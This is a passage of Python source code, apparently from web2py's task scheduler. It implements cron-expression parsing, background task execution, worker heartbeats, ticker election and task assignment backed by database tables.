        # Build parent -> {children} adjacency map.
        nested_dict = {}
        for row in edges:
            k = row.task_parent
            if k in nested_dict:
                nested_dict[k].add(row.task_child)
            else:
                nested_dict[k] = set((row.task_child,))
        try:
            rtn = []
            for k, v in nested_dict.items():
                v.discard(k)  # Ignore self dependencies
            # Nodes that appear only as children get an empty dependency set.
            extra_items_in_deps = reduce(set.union, nested_dict.values()) - set(nested_dict.keys())
            nested_dict.update(dict((item, set()) for item in extra_items_in_deps))
            # Kahn-style peeling: repeatedly extract the dependency-free layer.
            while True:
                ordered = set(item for item, dep in nested_dict.items() if not dep)
                if not ordered:
                    break
                rtn.append(ordered)
                nested_dict = dict(
                    (item, (dep - ordered))
                    for item, dep in nested_dict.items()
                    if item not in ordered
                )
            # Anything left over could not be ordered => cycle.
            assert not nested_dict, "A cyclic dependency exists amongst %r" % nested_dict
            db.commit()
            return rtn
        except Exception:
            db.rollback()
            return None


class CronParser(object):
    """Parses a crontab-style line and yields successive run datetimes.

    `next()` returns the first datetime strictly after `base` (or after the
    previously returned value) matching the expression.
    """
    def __init__(self, cronline, base=None):
        self.cronline = cronline
        self.sched = base or datetime.datetime.now()
        self.task = None  # parsed field-sets, filled lazily by _parse()

    @staticmethod
    def _rangetolist(s, period='min'):
        # Expand "a-b/step" or "a/step" (with '*' already normalized to the
        # field's full range) into an explicit list of ints.
        if s.startswith('*'):
            if period == 'min':
                s = s.replace('*', '0-59', 1)
            elif period == 'hr':
                s = s.replace('*', '0-23', 1)
            elif period == 'dom':
                s = s.replace('*', '1-31', 1)
            elif period == 'mon':
                s = s.replace('*', '1-12', 1)
            elif period == 'dow':
                s = s.replace('*', '0-6', 1)
        match = re.match(r'(\d+)-(\d+)/(\d+)', s)
        if match:
            max_ = int(match.group(2)) + 1
            step_ = int(match.group(3))
        else:
            match = re.match(r'(\d+)/(\d+)', s)
            if match:
                # "a/step": run to the field's natural maximum.
                ranges_max = dict(min=59, hr=23, mon=12, dom=31, dow=7)
                max_ = ranges_max[period] + 1
                step_ = int(match.group(2))
        if match:
            min_ = int(match.group(1))
            retval = list(range(min_, max_, step_))
        else:
            retval = []
        return retval

    @staticmethod
    def _sanitycheck(values, period):
        # Verify every parsed value lies in the legal range for its field.
        if period == 'min':
            check = all(0 <= i <= 59 for i in values)
        elif period == 'hr':
            check = all(0 <= i <= 23 for i in values)
        elif period == 'dom':
            domrange = list(range(1, 32)) + ['l']  # 'l' = last day of month
            check = all(i in domrange for i in values)
        elif period == 'mon':
            check = all(1 <= i <= 12 for i in values)
        elif period == 'dow':
            check = all(0 <= i <= 7 for i in values)
        return check

    def _parse(self):
        """Parse self.cronline into self.task: {field: sorted values}.

        Fields left as '*' are simply absent from the dict.
        Raises ValueError on malformed expressions.
        """
        line = self.cronline.lower()
        task = {}
        # Expand the @-shortcuts to their 5-field equivalents.
        if line.startswith('@yearly'):
            line = line.replace('@yearly', '0 0 1 1 *')
        elif line.startswith('@annually'):
            line = line.replace('@annually', '0 0 1 1 *')
        elif line.startswith('@monthly'):
            line = line.replace('@monthly', '0 0 1 * *')
        elif line.startswith('@weekly'):
            line = line.replace('@weekly', '0 0 * * 0')
        elif line.startswith('@daily'):
            line = line.replace('@daily', '0 0 * * *')
        elif line.startswith('@midnight'):
            line = line.replace('@midnight', '0 0 * * *')
        elif line.startswith('@hourly'):
            line = line.replace('@hourly', '0 * * * *')
        params = line.strip().split()
        if len(params) < 5:
            raise ValueError('Invalid cron line (too short)')
        elif len(params) > 5:
            raise ValueError('Invalid cron line (too long)')
        daysofweek = {'sun': 0, 'mon': 1, 'tue': 2, 'wed': 3,
                      'thu': 4, 'fri': 5, 'sat': 6}
        monthsofyear = {'jan': 1, 'feb': 2, 'mar': 3, 'apr': 4,
                        'may': 5, 'jun': 6, 'jul': 7, 'aug': 8,
                        'sep': 9, 'oct': 10, 'nov': 11, 'dec': 12}
        for (s, i) in zip(params, ('min', 'hr', 'dom', 'mon', 'dow')):
            if s != '*':
                task[i] = []
                vals = s.split(',')
                for val in vals:
                    if i == 'dow':
                        refdict = daysofweek
                    elif i == 'mon':
                        refdict = monthsofyear
                    # Named ranges like "mon-fri" are mapped to numbers first.
                    if i in ('dow', 'mon') and '-' in val and '/' not in val:
                        isnum = val.split('-')[0].isdigit()
                        if isnum:
                            val = '%s/1' % val
                        else:
                            val = '-'.join([str(refdict.get(v, ''))
                                            for v in val.split('-')])
                    if '-' in val and '/' not in val:
                        val = '%s/1' % val  # plain range == step of 1
                    if '/' in val:
                        task[i] += self._rangetolist(val, i)
                    elif val.isdigit():
                        task[i].append(int(val))
                    elif i in ('dow', 'mon'):
                        if val in refdict:
                            task[i].append(refdict[val])
                    elif i == 'dom' and val == 'l':
                        task[i].append(val)
                if not task[i]:
                    raise ValueError('Invalid cron value (%s)' % s)
                if not self._sanitycheck(task[i], i):
                    raise ValueError('Invalid cron value (%s)' % s)
                task[i] = sorted(task[i])
        self.task = task

    @staticmethod
    def _get_next_dow(sched, task):
        # Advance day-by-day until the weekday matches (7 is normalized to 0).
        task_dow = [a % 7 for a in task['dow']]
        while sched.isoweekday() % 7 not in task_dow:
            sched += datetime.timedelta(days=1)
        return sched

    @staticmethod
    def _get_next_dom(sched, task):
        # Advance day-by-day until the day-of-month matches; 'l' means the
        # last day of the current month.
        if task['dom'] == ['l']:
            # instead of calendar.isleap
            try:
                last_feb = 29
                datetime.date(sched.year, 2, last_feb)
            except ValueError:
                last_feb = 28
            lastdayofmonth = [
                31, last_feb, 31, 30, 31, 30, 31, 31, 30, 31, 30, 31
            ]
            task_dom = [lastdayofmonth[sched.month - 1]]
        else:
            task_dom = task['dom']
        while sched.day not in task_dom:
            sched += datetime.timedelta(days=1)
        return sched

    @staticmethod
    def _get_next_mon(sched, task):
        # Advance month-by-month (rolling the year) until the month matches.
        while sched.month not in task['mon']:
            if sched.month < 12:
                sched = sched.replace(month=sched.month + 1)
            else:
                sched = sched.replace(month=1, year=sched.year + 1)
        return sched

    @staticmethod
    def _getnext_hhmm(sched, task, add_to=True):
        # Advance minute/hour to the next matching time-of-day; add_to=True
        # first moves one minute forward so "now" itself is excluded.
        if add_to:
            sched += datetime.timedelta(minutes=1)
        if 'min' in task:
            while sched.minute not in task['min']:
                sched += datetime.timedelta(minutes=1)
        if 'hr' in task and sched.hour not in task['hr']:
            while sched.hour not in task['hr']:
                sched += datetime.timedelta(hours=1)
        return sched

    def _getnext_date(self, sched, task):
        # Resolve the date part: when both dow and dom are constrained, cron
        # semantics take whichever matches first.
        if 'dow' in task and 'dom' in task:
            dow = self._get_next_dow(sched, task)
            dom = self._get_next_dom(sched, task)
            sched = min(dow, dom)
        elif 'dow' in task:
            sched = self._get_next_dow(sched, task)
        elif 'dom' in task:
            sched = self._get_next_dom(sched, task)
        if 'mon' in task:
            sched = self._get_next_mon(sched, task)
        return sched.replace(hour=0, minute=0)

    def next(self):
        """Get next date according to specs."""
        if not self.task:
            self._parse()
        task = self.task
        sched = self.sched
        x = 0
        while x < 1000:  # avoid potential max recursions
            x += 1
            try:
                next_date = self._getnext_date(sched, task)
            except (ValueError, OverflowError) as e:
                raise ValueError('Invalid cron expression (%s)' % e)
            if next_date.date() > self.sched.date():
                # we rolled date, check for valid hhmm
                sched = self._getnext_hhmm(next_date, task, False)
                break
            else:
                # same date, get next hhmm
                sched_time = self._getnext_hhmm(sched, task, True)
                if sched_time.date() > sched.date():
                    # we rolled date again :(  — loop once more to re-check
                    # the date constraints against the new day
                    sched = sched_time
                else:
                    sched = sched_time
                    break
        else:
            raise ValueError('Potential bug found, please submit your '
                             'cron expression to the authors')
        self.sched = sched
        return sched

    def __iter__(self):
        """Support iteration."""
        return self

    __next__ = next


# the two functions below deal with simplejson decoding as unicode,
# esp for the dict decode and subsequent usage as function Keyword arguments
# unicode variable names won't work!
# borrowed from http://stackoverflow.com/questions/956867/
def _decode_list(lst):
    # Python 3: no-op; Python 2: recursively convert unicode items to bytes.
    if not PY2:
        return lst
    newlist = []
    for i in lst:
        if isinstance(i, string_types):
            i = to_bytes(i)
        elif isinstance(i, list):
            i = _decode_list(i)
        newlist.append(i)
    return newlist


def _decode_dict(dct):
    # Python 3: no-op; Python 2: convert keys/values so they can be used as
    # **kwargs (unicode keyword names are rejected by Python 2).
    if not PY2:
        return dct
    newdict = {}
    for k, v in iteritems(dct):
        k = to_bytes(k)
        if isinstance(v, string_types):
            v = to_bytes(v)
        elif isinstance(v, list):
            v = _decode_list(v)
        newdict[k] = v
    return newdict


def executor(retq, task, outq):
    """The function used to execute tasks in the background process.

    Args:
        retq: queue where the final TaskReport is put (read by Scheduler)
        task: the Task to run
        outq: queue receiving captured stdout chunks as the task runs
    """
    logger.debug('    task started')

    class LogOutput(object):
        """Facility to log output at intervals."""
        # Replaces sys.stdout so everything the task prints is streamed to
        # outq; close() restores stdout and detaches the queue feeder thread.

        def __init__(self, out_queue):
            self.out_queue = out_queue
            self.stdout = sys.stdout
            self.written = False
            sys.stdout = self

        def close(self):
            sys.stdout = self.stdout
            if self.written:
                # see "Joining processes that use queues" section in
                # https://docs.python.org/2/library/multiprocessing.html#programming-guidelines
                # https://docs.python.org/3/library/multiprocessing.html#programming-guidelines
                self.out_queue.cancel_join_thread()

        def flush(self):
            pass

        def write(self, data):
            self.out_queue.put(data)
            self.written = True

    W2P_TASK = Storage({
        'id': task.task_id,
        'uuid': task.uuid,
        'run_id': task.run_id
    })
    stdout = LogOutput(outq)
    try:
        if task.app:
            from gluon.shell import env, parse_path_info
            from gluon import current
            # FIXME: why temporarily change the log level of the root logger?
            # level = logging.getLogger().getEffectiveLevel()
            # logging.getLogger().setLevel(logging.WARN)
            # support for task.app like 'app/controller'
            (a, c, f) = parse_path_info(task.app)
            _env = env(a=a, c=c, import_models=True,
                       extra_request={'is_scheduler': True})
            # logging.getLogger().setLevel(level)
            f = task.function
            functions = current._scheduler.tasks
            if functions:
                _function = functions.get(f)
            else:
                # look into env
                _function = _env.get(f)
            if not isinstance(_function, CALLABLETYPES):
                raise NameError(
                    "name '%s' not found in scheduler's environment" % f)
            # Inject W2P_TASK into environment
            _env.update({'W2P_TASK': W2P_TASK})
            # Inject W2P_TASK into current
            current.W2P_TASK = W2P_TASK
            globals().update(_env)
            args = _decode_list(loads(task.args))
            vars = loads(task.vars, object_hook=_decode_dict)
            result = dumps(_function(*args, **vars))
        else:
            # for testing purpose only
            result = eval(task.function)(
                *loads(task.args, object_hook=_decode_dict),
                **loads(task.vars, object_hook=_decode_dict))
        # Large results are spilled to a temp file and referenced by path
        # (see RESULTINFILE) to keep the multiprocessing queue payload small.
        if len(result) >= 1024:
            fd, temp_path = tempfile.mkstemp(suffix='.w2p_sched')
            with os.fdopen(fd, 'w') as f:
                f.write(result)
            result = RESULTINFILE + temp_path
        retq.put(TaskReport('COMPLETED', result=result))
    except:
        # Deliberately broad: any failure in user code must be reported back
        # to the scheduler as FAILED with its traceback, never crash silently.
        tb = traceback.format_exc()
        retq.put(TaskReport('FAILED', tb=tb))
    finally:
        stdout.close()


class IS_CRONLINE(object):
    """
    Validates cronline
    """
    def __init__(self, error_message=None):
        self.error_message = error_message

    def __call__(self, value, record_id=None):
        # Valid iff CronParser can compute a next run time from the value.
        recur = CronParser(value, datetime.datetime.now())
        try:
            recur.next()
            return (value, None)
        except ValueError as e:
            if not self.error_message:
                return (value, e)
            return (value, self.error_message)


class TYPE(object):
    """
    Validator that checks whether field is valid json and validates its type.
Used for `args` and `vars` of the scheduler_task table """ def __init__(self, myclass=list, parse=False): self.myclass = myclass self.parse = parse def __call__(self, value, record_id=None): from gluon import current try: obj = loads(value) except: return (value, current.T('invalid json')) else: if isinstance(obj, self.myclass): if self.parse: return (obj, None) else: return (value, None) else: return (value, current.T('Not of type: %s') % self.myclass) TASK_STATUS = (QUEUED, RUNNING, COMPLETED, FAILED, TIMEOUT, STOPPED, EXPIRED) RUN_STATUS = (RUNNING, COMPLETED, FAILED, TIMEOUT, STOPPED) WORKER_STATUS = (ACTIVE, PICK, DISABLED, TERMINATE, KILL, STOP_TASK) class Scheduler(threading.Thread): """Scheduler object Args: db: DAL connection where Scheduler will create its tables tasks(dict): either a dict containing name-->func or None. If None, functions will be searched in the environment migrate(bool): turn migration on/off for the Scheduler's tables worker_name(str): force worker_name to identify each process. Leave it to None to autoassign a name (hostname#pid) group_names(list): process tasks belonging to this group defaults to ['main'] if nothing gets passed heartbeat(int): how many seconds the worker sleeps between one execution and the following one. Indirectly sets how many seconds will pass between checks for new tasks max_empty_runs(int): how many loops are allowed to pass without processing any tasks before exiting the process. 0 to keep always the process alive discard_results(bool): Scheduler stores executions's details into the scheduler_run table. By default, only if there is a result the details are kept. Turning this to True means discarding results even for tasks that return something utc_time(bool): do all datetime calculations assuming UTC as the timezone. 
Remember to pass `start_time` and `stop_time` to tasks accordingly use_spawn(bool): use spawn for subprocess (only useable with python3) """ def __init__(self, db, tasks=None, migrate=True, worker_name=None, group_names=None, heartbeat=HEARTBEAT, max_empty_runs=0, discard_results=False, utc_time=False, use_spawn=False): threading.Thread.__init__(self) self.setDaemon(True) self.process = None # the background process self.process_queues = (None, None) self.have_heartbeat = True # set to False to kill self.empty_runs = 0 self.db = db self.db_thread = None self.tasks = tasks self.group_names = group_names or ['main'] self.heartbeat = heartbeat self.worker_name = worker_name or IDENTIFIER self.max_empty_runs = max_empty_runs self.discard_results = discard_results self.is_a_ticker = False self.do_assign_tasks = False self.greedy = False self.utc_time = utc_time self.w_stats_lock = threading.RLock() self.w_stats = Storage( dict( status=RUNNING, sleep=heartbeat, total=0, errors=0, empty_runs=0, queue=0, distribution=None, workers=0) ) # dict holding statistics from gluon import current current._scheduler = self self.define_tables(db, migrate=migrate) self.use_spawn = use_spawn def execute(self, task): """Start the background process. 
Args: task : a `Task` object Returns: a `TaskReport` object """ outq = None retq = None if (self.use_spawn and not PY2): ctx = multiprocessing.get_context('spawn') outq = ctx.Queue() retq = ctx.Queue(maxsize=1) self.process = p = ctx.Process(target=executor, args=(retq, task, outq)) else: outq = multiprocessing.Queue() retq = multiprocessing.Queue(maxsize=1) self.process = p = \ multiprocessing.Process(target=executor, args=(retq, task, outq)) self.process_queues = (retq, outq) logger.debug(' task starting') p.start() start = time.time() if task.sync_output > 0: run_timeout = task.sync_output else: run_timeout = task.timeout task_output = tout = '' try: while p.is_alive() and (not task.timeout or time.time() - start < task.timeout): # NOTE: try always to empty the out queue before # the child process is joined, # see "Joining processes that use queues" section in # https://docs.python.org/2/library/multiprocessing.html#programming-guidelines # https://docs.python.org/3/library/multiprocessing.html#programming-guidelines while True: try: tout += outq.get(timeout=2) except Queue.Empty: break if tout: logger.debug(' partial output: "%s"', tout) if CLEAROUT in tout: task_output = tout[ tout.rfind(CLEAROUT) + len(CLEAROUT):] else: task_output += tout try: db = self.db db(db.scheduler_run.id == task.run_id).update(run_output=task_output) db.commit() tout = '' logger.debug(' partial output saved') except Exception: logger.exception(' error while saving partial output') task_output = task_output[:-len(tout)] p.join(timeout=run_timeout) except: logger.exception(' task stopped by general exception') self.terminate_process() tr = TaskReport(STOPPED) else: if p.is_alive(): logger.debug(' task timeout') self.terminate_process(flush_ret=False) try: # we try to get a traceback here tr = retq.get(timeout=2) # NOTE: risky after terminate tr.status = TIMEOUT tr.output = task_output except Queue.Empty: tr = TaskReport(TIMEOUT) else: try: tr = retq.get_nowait() except Queue.Empty: 
logger.debug(' task stopped') tr = TaskReport(STOPPED) else: logger.debug(' task completed or failed') result = tr.result if result and result.startswith(RESULTINFILE): temp_path = result.replace(RESULTINFILE, '', 1) with open(temp_path) as f: tr.result = f.read() os.unlink(temp_path) tr.output = task_output return tr _terminate_process_lock = threading.RLock() def terminate_process(self, flush_out=True, flush_ret=True): """Terminate any running tasks (internal use only)""" if self.process is not None: # must synchronize since we are called by main and heartbeat thread with self._terminate_process_lock: if flush_out: queue = self.process_queues[1] while not queue.empty(): # NOTE: empty() is not reliable try: queue.get_nowait() except Queue.Empty: pass if flush_ret: queue = self.process_queues[0] while not queue.empty(): try: queue.get_nowait() except Queue.Empty: pass logger.debug('terminating process') try: # NOTE: terminate should not be called when using shared # resources, see "Avoid terminating processes" # section in # https://docs.python.org/2/library/multiprocessing.html#programming-guidelines # https://docs.python.org/3/library/multiprocessing.html#programming-guidelines self.process.terminate() # NOTE: calling join after a terminate is risky, # as explained in "Avoid terminating processes" # section this can lead to a deadlock self.process.join() finally: self.process = None def die(self): """Forces termination of the worker process along with any running task""" logger.info('die!') self.have_heartbeat = False self.terminate_process() def give_up(self): """Waits for any running task to be executed, then exits the worker process""" logger.info('Giving up as soon as possible!') self.have_heartbeat = False def run(self): """This is executed by the heartbeat thread""" counter = 0 while self.have_heartbeat: self.send_heartbeat(counter) counter += 1 def start_heartbeats(self): self.start() def __get_migrate(self, tablename, migrate=True): if migrate is False: 
return False elif migrate is True: return True elif isinstance(migrate, str): return "%s%s.table" % (migrate, tablename) return True def now(self): """Shortcut that fetches current time based on UTC preferences.""" return self.utc_time and datetime.datetime.utcnow() or datetime.datetime.now() def set_requirements(self, scheduler_task): """Called to set defaults for lazy_tables connections.""" from gluon import current if hasattr(current, 'request'): scheduler_task.application_name.default = '%s/%s' % ( current.request.application, current.request.controller ) def define_tables(self, db, migrate): """Define Scheduler tables structure.""" from pydal.base import DEFAULT logger.debug('defining tables (migrate=%s)', migrate) now = self.now db.define_table( 'scheduler_task', Field('application_name', requires=IS_NOT_EMPTY(), default=None, writable=False), Field('task_name', default=None), Field('group_name', default='main'), Field('status', requires=IS_IN_SET(TASK_STATUS), default=QUEUED, writable=False), Field('broadcast', 'boolean', default=False), Field('function_name', requires=IS_IN_SET(sorted(self.tasks.keys())) if self.tasks else DEFAULT), Field('uuid', length=255, requires=IS_NOT_IN_DB(db, 'scheduler_task.uuid'), unique=True, default=web2py_uuid), Field('args', 'text', default='[]', requires=TYPE(list)), Field('vars', 'text', default='{}', requires=TYPE(dict)), Field('enabled', 'boolean', default=True), Field('start_time', 'datetime', default=now, requires=IS_DATETIME()), Field('next_run_time', 'datetime', default=now), Field('stop_time', 'datetime'), Field('repeats', 'integer', default=1, comment="0=unlimited", requires=IS_INT_IN_RANGE(0, None)), Field('retry_failed', 'integer', default=0, comment="-1=unlimited", requires=IS_INT_IN_RANGE(-1, None)), Field('period', 'integer', default=60, comment='seconds', requires=IS_INT_IN_RANGE(0, None)), Field('prevent_drift', 'boolean', default=False, comment='Exact start_times between runs'), Field('cronline', 
default=None, comment='Discard "period", use this cron expr instead', requires=IS_EMPTY_OR(IS_CRONLINE())), Field('timeout', 'integer', default=60, comment='seconds', requires=IS_INT_IN_RANGE(1, None)), Field('sync_output', 'integer', default=0, comment="update output every n sec: 0=never", requires=IS_INT_IN_RANGE(0, None)), Field('times_run', 'integer', default=0, writable=False), Field('times_failed', 'integer', default=0, writable=False), Field('last_run_time', 'datetime', writable=False, readable=False), Field('assigned_worker_name', default='', writable=False), on_define=self.set_requirements, migrate=self.__get_migrate('scheduler_task', migrate), format='(%(id)s) %(task_name)s') db.define_table( 'scheduler_run', Field('task_id', 'reference scheduler_task'), Field('status', requires=IS_IN_SET(RUN_STATUS)), Field('start_time', 'datetime'), Field('stop_time', 'datetime'), Field('run_output', 'text'), Field('run_result', 'text'), Field('traceback', 'text'), Field('worker_name', default=self.worker_name), migrate=self.__get_migrate('scheduler_run', migrate) ) db.define_table( 'scheduler_worker', Field('worker_name', length=255, unique=True), Field('first_heartbeat', 'datetime'), Field('last_heartbeat', 'datetime'), Field('status', requires=IS_IN_SET(WORKER_STATUS)), Field('is_ticker', 'boolean', default=False, writable=False), Field('group_names', 'list:string', default=self.group_names), Field('worker_stats', 'json'), migrate=self.__get_migrate('scheduler_worker', migrate) ) db.define_table( 'scheduler_task_deps', Field('job_name', default='job_0'), Field('task_parent', 'integer', requires=IS_IN_DB(db, 'scheduler_task.id', '%(task_name)s') ), Field('task_child', 'reference scheduler_task'), Field('can_visit', 'boolean', default=False), migrate=self.__get_migrate('scheduler_task_deps', migrate) ) if migrate is not False: db.commit() def loop(self, worker_name=None): """Main loop. 
This works basically as a neverending loop that: - checks if the worker is ready to process tasks (is not DISABLED) - pops a task from the queue - if there is a task: - spawns the executor background process - waits for the process to be finished - sleeps `heartbeat` seconds - if there is not a task: - checks for max_empty_runs - sleeps `heartbeat` seconds """ signal.signal(signal.SIGTERM, lambda signum, stack_frame: sys.exit(1)) try: self.start_heartbeats() while self.have_heartbeat: with self.w_stats_lock: is_disabled = self.w_stats.status == DISABLED if is_disabled: logger.debug('Someone stopped me, sleeping until better' ' times come (%s)', self.w_stats.sleep) self.sleep() continue logger.debug('looping...') if self.is_a_ticker and self.do_assign_tasks: # I'm a ticker, and 5 loops passed without # reassigning tasks, let's do that self.wrapped_assign_tasks() task = self.wrapped_pop_task() if task: with self.w_stats_lock: self.w_stats.empty_runs = 0 self.w_stats.status = RUNNING self.w_stats.total += 1 self.wrapped_report_task(task, self.execute(task)) with self.w_stats_lock: if not self.w_stats.status == DISABLED: self.w_stats.status = ACTIVE else: with self.w_stats_lock: self.w_stats.empty_runs += 1 if self.max_empty_runs != 0: logger.debug('empty runs %s/%s', self.w_stats.empty_runs, self.max_empty_runs) if self.w_stats.empty_runs >= self.max_empty_runs: logger.info( 'empty runs limit reached, killing myself') self.die() if self.is_a_ticker and self.greedy: # there could be other tasks ready to be assigned logger.info('TICKER: greedy loop') self.wrapped_assign_tasks() logger.debug('sleeping...') self.sleep() except (KeyboardInterrupt, SystemExit): logger.info('catched') self.die() def wrapped_pop_task(self): """Commodity function to call `pop_task` and trap exceptions. If an exception is raised, assume it happened because of database contention and retries `pop_task` after 0.5 seconds """ db = self.db db.commit() # for MySQL only; FIXME: Niphlod, still needed? 
could avoid when not MySQL? for x in range(10): try: return self.pop_task() except Exception: logger.exception(' error popping tasks') self.w_stats.errors += 1 db.rollback() time.sleep(0.5) def pop_task(self): """Grab a task ready to be executed from the queue.""" now = self.now() db = self.db st = db.scheduler_task grabbed = db( (st.assigned_worker_name == self.worker_name) & (st.status == ASSIGNED) ) task = grabbed.select(limitby=(0, 1), orderby=st.next_run_time).first() if task: # none will touch my task! task.update_record(status=RUNNING, last_run_time=now) db.commit() logger.debug(' work to do %s', task.id) else: logger.info('nothing to do') return None if task.cronline: cron_recur = CronParser(task.cronline, now.replace(second=0, microsecond=0)) next_run_time = cron_recur.next() elif not task.prevent_drift: next_run_time = task.last_run_time + datetime.timedelta( seconds=task.period ) else: # calc next_run_time based on available slots # see #1191 next_run_time = task.start_time secondspassed = (now - next_run_time).total_seconds() times = secondspassed // task.period + 1 next_run_time += datetime.timedelta(seconds=task.period * times) times_run = task.times_run + 1 if times_run < task.repeats or task.repeats == 0: # need to run (repeating task) run_again = True else: # no need to run again run_again = False run_id = 0 while not self.discard_results: # FIXME: forever? 
            logger.debug(' new scheduler_run record')
            try:
                # Record this run in scheduler_run so its outcome (result,
                # output, traceback) can be attached later by report_task().
                run_id = db.scheduler_run.insert(
                    task_id=task.id,
                    status=RUNNING,
                    start_time=now,
                    worker_name=self.worker_name)
                db.commit()
                break
            except Exception:
                # assumed transient db contention: roll back and retry shortly
                logger.exception(' error inserting scheduler_run')
                db.rollback()
                time.sleep(0.5)
        logger.info('new task %(id)s "%(task_name)s"'
                    ' %(application_name)s.%(function_name)s' % task)
        # Hand the executor everything it needs to run the task now and to
        # reschedule it afterwards (next_run_time, run_again, counters).
        return Task(
            app=task.application_name,
            function=task.function_name,
            timeout=task.timeout,
            args=task.args,  # in json
            vars=task.vars,  # in json
            task_id=task.id,
            run_id=run_id,
            run_again=run_again,
            next_run_time=next_run_time,
            times_run=times_run,
            stop_time=task.stop_time,
            retry_failed=task.retry_failed,
            times_failed=task.times_failed,
            sync_output=task.sync_output,
            uuid=task.uuid)

    def wrapped_report_task(self, task, task_report):
        """Commodity function to call `report_task` and trap exceptions.

        If an exception is raised, assume it happened because of database
        contention and retries `report_task` after 0.5 seconds
        """
        db = self.db
        while True:  # FIXME: forever?
            try:
                self.report_task(task, task_report)
                db.commit()
                break
            except Exception:
                # NOTE(review): presumably db contention; retried forever —
                # a permanently failing report would spin this loop
                logger.exception(' error storing result')
                db.rollback()
                time.sleep(0.5)

    def report_task(self, task, task_report):
        """Take care of storing the result according to preferences.

        Deals with logic for repeating tasks.
""" now = self.now() db = self.db st = db.scheduler_task sr = db.scheduler_run if not self.discard_results: if task_report.result != 'null' or task_report.tb: # result is 'null' as a string if task completed # if it's stopped it's None as NoneType, so we record # the STOPPED "run" anyway logger.debug(' recording task report in db (%s)', task_report.status) db(sr.id == task.run_id).update( status=task_report.status, stop_time=now, run_result=task_report.result, run_output=task_report.output, traceback=task_report.tb) else: logger.debug(' deleting task report in db because of no result') db(sr.id == task.run_id).delete() # if there is a stop_time and the following run would exceed it is_expired = (task.stop_time and task.next_run_time > task.stop_time or False) status = (task.run_again and is_expired and EXPIRED or task.run_again and not is_expired and QUEUED or COMPLETED) if task_report.status == COMPLETED: d = dict(status=status, next_run_time=task.next_run_time, times_run=task.times_run, times_failed=0 ) db(st.id == task.task_id).update(**d) if status == COMPLETED: self.update_dependencies(task.task_id) else: st_mapping = {'FAILED': 'FAILED', 'TIMEOUT': 'TIMEOUT', 'STOPPED': 'FAILED'}[task_report.status] status = (task.retry_failed and task.times_failed < task.retry_failed and QUEUED or task.retry_failed == -1 and QUEUED or st_mapping) db(st.id == task.task_id).update( times_failed=st.times_failed + 1, next_run_time=task.next_run_time, status=status ) logger.info('task completed (%s)', task_report.status) def update_dependencies(self, task_id): """Unblock execution paths for Jobs.""" db = self.db db(db.scheduler_task_deps.task_child == task_id).update(can_visit=True) def adj_hibernation(self): """Used to increase the "sleep" interval for DISABLED workers.""" with self.w_stats_lock: if self.w_stats.status == DISABLED: wk_st = self.w_stats.sleep hibernation = wk_st + HEARTBEAT if wk_st < MAXHIBERNATION else MAXHIBERNATION self.w_stats.sleep = hibernation def 
send_heartbeat(self, counter): """Coordination among available workers. It: - sends the heartbeat - elects a ticker among available workers (the only process that effectively dispatch tasks to workers) - deals with worker's statuses - does "housecleaning" for dead workers - triggers tasks assignment to workers """ if self.db_thread: # BKR 20180612 check if connection still works try: self.db_thread(self.db_thread.scheduler_worker).count() except self.db_thread._adapter.connection.OperationalError: # if not -> throw away self.db_thread and force reconnect self.db_thread = None if not self.db_thread: logger.debug('thread building own DAL object') self.db_thread = DAL( self.db._uri, folder=self.db._adapter.folder, decode_credentials=True) self.define_tables(self.db_thread, migrate=False) try: now = self.now() db = self.db_thread sw = db.scheduler_worker st = db.scheduler_task # record heartbeat row = db(sw.worker_name == self.worker_name).select().first() with self.w_stats_lock: if not row: sw.insert(status=ACTIVE, worker_name=self.worker_name, first_heartbeat=now, last_heartbeat=now, group_names=self.group_names, worker_stats=self.w_stats) self.w_stats.status = ACTIVE self.w_stats.sleep = self.heartbeat backed_status = ACTIVE else: backed_status = row.status if backed_status == DISABLED: # keep sleeping self.w_stats.status = DISABLED logger.debug('........recording heartbeat (DISABLED)') db(sw.worker_name == self.worker_name).update( last_heartbeat=now, worker_stats=self.w_stats) elif backed_status == TERMINATE: self.w_stats.status = TERMINATE logger.debug("Waiting to terminate the current task") self.give_up() elif backed_status == KILL: self.w_stats.status = KILL self.die() return else: if backed_status == STOP_TASK: logger.info('Asked to kill the current task') self.terminate_process() logger.debug('........recording heartbeat (%s)', self.w_stats.status) db(sw.worker_name == self.worker_name).update( last_heartbeat=now, status=ACTIVE, worker_stats=self.w_stats) 
self.w_stats.sleep = self.heartbeat # re-activating the process if self.w_stats.status != RUNNING: self.w_stats.status = ACTIVE self.do_assign_tasks = False if counter % 5 == 0 or backed_status == PICK: try: # delete dead workers expiration = now - datetime.timedelta( seconds=self.heartbeat * 3) departure = now - datetime.timedelta( seconds=self.heartbeat * 3 * 15) logger.debug( ' freeing workers that have not sent heartbeat') dead_workers = db( ((sw.last_heartbeat < expiration) & (sw.status == ACTIVE)) | ((sw.last_heartbeat < departure) & (sw.status != ACTIVE)) ) dead_workers_name = dead_workers._select(sw.worker_name) db( (st.assigned_worker_name.belongs(dead_workers_name)) & (st.status == RUNNING) ).update(assigned_worker_name='', status=QUEUED) dead_workers.delete() try: self.is_a_ticker = self.being_a_ticker() except: logger.exception('Error coordinating TICKER') with self.w_stats_lock: if self.w_stats.status == ACTIVE: self.do_assign_tasks = True except: logger.exception('Error cleaning up') db.commit() except: logger.exception('Error retrieving status') db.rollback() self.adj_hibernation() self.sleep() def being_a_ticker(self): """Elect a TICKER process that assigns tasks to available workers. 
Does its best to elect a worker that is not busy processing other tasks to allow a proper distribution of tasks among all active workers ASAP """ db = self.db_thread sw = db.scheduler_worker my_name = self.worker_name all_active = db( (sw.worker_name != my_name) & (sw.status == ACTIVE) ).select(sw.is_ticker, sw.worker_name) ticker = all_active.find(lambda row: row.is_ticker is True).first() with self.w_stats_lock: not_busy = self.w_stats.status == ACTIVE if not ticker: # if no other tickers are around if not_busy: # only if I'm not busy db(sw.worker_name == my_name).update(is_ticker=True) db(sw.worker_name != my_name).update(is_ticker=False) logger.info("TICKER: I'm a ticker") else: # I'm busy if len(all_active) >= 1: # so I'll "downgrade" myself to a "poor worker" db(sw.worker_name == my_name).update(is_ticker=False) else: not_busy = True db.commit() return not_busy else: logger.info( "%s is a ticker, I'm a poor worker" % ticker.worker_name) return False def wrapped_assign_tasks(self): """Commodity function to call `assign_tasks` and trap exceptions. If an exception is raised, assume it happened because of database contention and retries `assign_task` after 0.5 seconds """ logger.debug('Assigning tasks...') db = self.db db.commit() # for MySQL only; FIXME: Niphlod, still needed? could avoid when not MySQL? for x in range(10): try: self.assign_tasks() db.commit() logger.debug('Tasks assigned...') break except Exception: logger.exception('TICKER: error assigning 